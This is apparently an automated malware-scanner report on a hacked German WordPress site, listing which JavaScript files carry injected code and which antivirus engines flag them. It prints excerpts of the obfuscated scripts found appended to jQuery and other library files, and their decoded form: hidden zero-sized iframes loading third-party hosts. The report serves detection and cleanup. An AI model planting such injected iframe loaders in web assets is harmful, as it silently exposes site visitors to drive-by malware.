
Malware Scanner report for neuverschuldung-stoppen.de

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "neuverschuldung-stoppen.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=neuverschuldung-stoppen.de

Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://neuverschuldung-stoppen.de/
200 OK
Content-Length: 16127
Content-Type: text/html
clean
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/l10n.js?ver=20101110
200 OK
Content-Length: 6118
Content-Type: application/x-javascript
malicious
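Malicious code - confirmed by antiviruses (see below). The excerpt starts with the file's ordinary library code; the obfuscated injected script follows it.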

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!50!46!109!99!103!114!101!103!97!114!116!46!99!111!109!47!105!110!4
... 2953 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

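Decoded script (the markup the obfuscated code above resolves to; each iframe shown is zero-sized or sits in a hidden container, so the third-party URLs load without anything visible to the visitor):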


<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborde
... 87 bytes are skipped ...
op:45%; left:45%; border:5px solid gray; padding:40px; padding-top:10px; background:#fff; text-align:left;"><span style="color:gray; cursor:pointer; margin-bottom:20px; display:block;" onClick="$(this).parent().hide()"><img src="http://77.81.240.235/waiting.gif"></span></div><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Agent.GGJ
Emsisoft
Trojan.JS.Agent.GGJ (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
NANO-Antivirus
Trojan.Url.IframeB.bmlwta
F-Secure
Trojan.JS.Agent.GGJ
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Agent.GGJ
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Agent.GGJ

http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/jquery.js?ver=1.4.4
200 OK
Content-Length: 82746
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof
... 3103 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Iframe-GJ [Trj]
Ad-Aware
Trojan.JS.Iframe.AXN
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Iframe.AXN
K7AntiVirus
Backdoor ( 04c529a51 )
Emsisoft
Trojan.JS.Iframe.AXN (B)
Comodo
TrojWare.JS.Redirect.crk
K7GW
Backdoor ( 04c529a51 )
Microsoft
Trojan:JS/BlacoleRef.AY
Kaspersky
Trojan.JS.Iframe.aaq
MicroWorld-eScan
Trojan.JS.Iframe.AXN
Jiangmin
Trojan/Script.Gen
Cyren
JS/IFrame.AU
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.Iframe.AXN
F-Prot
JS/IFrame.AU
AVG
HTML/Framer
Norman
Iframe.RN
Zillya
Trojan.IFrame.Script.1
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.Iframe.AXN
Symantec
Trojan.Malscript!JS
BitDefender
Trojan.JS.Iframe.AXN

http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88
200 OK
Content-Length: 33706
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05
200 OK
Content-Length: 4424
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/ui.core.js?ver=1.8.9
200 OK
Content-Length: 8450
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.9",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,<
... 3073 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Iframe-GJ [Trj]
Ad-Aware
Trojan.JS.Iframe.AXN
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Iframe.AXN
K7AntiVirus
Backdoor ( 04c529a51 )
Comodo
TrojWare.JS.Redirect.crk
Emsisoft
Trojan.JS.Iframe.AXN (B)
K7GW
Backdoor ( 04c529a51 )
Microsoft
Trojan:JS/BlacoleRef.AY
Kaspersky
Trojan.JS.Iframe.aaq
MicroWorld-eScan
Trojan.JS.Iframe.AXN
Jiangmin
Trojan/Script.Gen
Cyren
JS/IFrame.AU
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.Iframe.AXN
F-Prot
JS/IFrame.AU
AVG
HTML/Framer
Norman
Iframe.RN
Zillya
Trojan.IFrame.Script.1
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.Iframe.AXN
Symantec
Trojan.Malscript!JS
BitDefender
Trojan.JS.Iframe.AXN

http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/ui.widget.js?ver=1.8.9
200 OK
Content-Length: 7399
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(b,j){if(b.cleanData){var k=b.cleanData;b.cleanData=function(a){for(var c=0,d;(d=a[c])!=null;c++)b(d).triggerHandler("remove");k(a)}}else{var l=b.fn.remove;b.fn.remove=function(a,c){return this.each(function(){if(!c)if(!a||b.filter(a,[this]).length)b("*",this).add([this]).each(function(){b(this).triggerHandler("remove")});return l.call(b(this),a,c)})}}b.widget=function(a,c,d){var e=a.split(".")[0],f;a=a.split(".")[1];f=e+"-"+a;if(!d){d=c;c=b.Widget}b.expr[":"][f]=function(h){return!!b.d
... 3089 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Iframe-GJ [Trj]
Ad-Aware
Trojan.JS.Iframe.AXN
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Iframe.AXN
K7AntiVirus
Backdoor ( 04c529a51 )
Emsisoft
Trojan.JS.Iframe.AXN (B)
Comodo
TrojWare.JS.Redirect.crk
K7GW
Backdoor ( 04c529a51 )
DrWeb
SCRIPT.Virus
Microsoft
Trojan:JS/BlacoleRef.AY
Kaspersky
Trojan.JS.Iframe.aaq
MicroWorld-eScan
Trojan.JS.Iframe.AXN
Jiangmin
Trojan/Script.Gen
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
Cyren
JS/IFrame.AU
F-Secure
Trojan.JS.Iframe.AXN
F-Prot
JS/IFrame.AU
AVG
HTML/Framer
Norman
Iframe.RN
Zillya
Trojan.IFrame.Script.1
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.Iframe.AXN
Symantec
Trojan.Malscript!JS
Agnitum
JS.Cored.A
BitDefender
Trojan.JS.Iframe.AXN

http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/jquery.ui.datepicker.js?ver=3.1.4
200 OK
Content-Length: 77814
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/custom-contact-forms-datepicker.js?ver=3.1.4
200 OK
Content-Length: 2794
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/jquery.tools.min.js?ver=3.1.4
200 OK
Content-Length: 120135
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/custom-contact-forms.js?ver=3.1.4
200 OK
Content-Length: 3502
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/cufon.js?ver=3.1.4
200 OK
Content-Length: 20931
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/quicksand.font.js?ver=3.1.4
200 OK
Content-Length: 62503
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.4
200 OK
Content-Length: 16851
Content-Type: application/x-javascript
clean
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/flashplayer/flowplayer-3.1.4.min.js?ver=3.1.4
200 OK
Content-Length: 18634
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){break}}}else{for(var s=t[0];p<r&&q.call(s,p,s)!==false;s=t[++p]){}}return t}function c(o){return document.getElementById(o)}function i(q,p,o){if(typeof p!="object"){r
... 3048 bytes are skipped ...
._$$+"/"+$.$$_$+$.$_$_+$.__+$.$_$_+"/\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$$_+$.___+"?\\"+$.__$+$.$$_+$.__$+"=\\"+$.__$+$.$$_+$._$$+$.$$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\\"></\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script (the trailing <div> is styled visibility:hidden and wraps an iframe that loads a third-party URL):


function () {
__flash_unloadHandler = function () {};
__flash_savedUnloadHandler = function () {};
}
<div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

AntiVir
JS/iFrame.EB.357
Microsoft
Exploit:HTML/IframeRef.DH
VIPRE
Malware.JS.Generic (JS)
AVware
Malware.JS.Generic (JS)
ESET-NOD32
JS/Iframe.DM


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 02 Sep 2014 02:48:22 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aqq2mbk62hjr59v5ehr9qh2hn5; path=/
X-Pingback: http://prototype.neuverschuldung-stoppen.de/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de
Referer: http://www.google.com/search?q=neuverschuldung-stoppen.de

Result:
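The result is similar to the first query. No suspicious redirects were found for these two request variants (no Referer, and a Google search Referer); other conditions were not tested.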